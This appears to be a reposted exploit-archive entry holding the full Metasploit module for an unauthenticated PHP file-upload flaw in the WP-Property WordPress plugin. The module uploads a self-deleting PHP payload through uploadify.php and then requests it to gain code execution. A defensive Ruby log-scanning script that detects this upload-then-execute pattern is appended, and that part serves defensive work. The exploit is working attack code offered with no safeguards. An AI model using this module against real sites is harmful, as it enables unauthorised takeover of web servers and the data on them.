
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is or how to use it. I'm just saying: msf.
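For defenders, the request pattern in the module above (a POST to the plugin's `uploadify.php`, then a GET for a different `.php` file in the same directory) can be searched for in web access logs. The following is an added example, not part of the original post or of Metasploit; it assumes Combined Log Format and same-client correlation, and the log lines, the `/wordpress` prefix and all function names are constructed for illustration.

```ruby
# Added defensive example; the log lines are constructed sample data.
UPLOADIFY_DIR = '/wp-content/plugins/wp-property/third-party/uploadify/'
UPLOADER      = "#{UPLOADIFY_DIR}uploadify.php"
PFX           = "/wordpress#{UPLOADIFY_DIR}"   # sample install path (assumed)

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

SAMPLE_LOG = [
  %(203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET #{PFX}uploadify.php HTTP/1.1" 200 0 "-" "-"),
  %(203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST #{PFX}uploadify.php HTTP/1.1" 200 71 "-" "-"),
  %(203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET #{PFX}AbCdE.php HTTP/1.1" 200 0 "-" "-"),
  %(198.51.100.9 - - [04/Jan/2013:19:41:00 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "-")
].freeze

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method],
    path: m[:path].split('?', 2).first, status: m[:status].to_i }
end

# True for a .php file sitting directly in the uploadify directory that is
# not the plugin's own uploadify.php.
def dropped_script?(path)
  idx = path.index(UPLOADIFY_DIR)
  return false unless idx
  rest = path[(idx + UPLOADIFY_DIR.length)..-1]
  rest.match?(/\A[^\/]+\.php\z/i) && rest.downcase != 'uploadify.php'
end

# Returns one finding per client that POSTed to uploadify.php, with the
# scripts that client later fetched from the same directory.
def find_uploadify_abuse(lines)
  uploads = {} # ip => finding
  lines.each do |line|
    e = parse_line(line)
    next unless e && e[:status] == 200
    if e[:method] == 'POST' && e[:path].end_with?(UPLOADER)
      uploads[e[:ip]] ||= { ip: e[:ip], upload_time: e[:time], executed: [] }
    elsif (f = uploads[e[:ip]]) && dropped_script?(e[:path])
      f[:executed] << e[:path] unless f[:executed].include?(e[:path])
    end
  end
  uploads.values
end
```

Because the module requests its payload with `:unlink_self=>true`, the uploaded file may no longer be on disk after it runs, so the access log can be the only remaining trace.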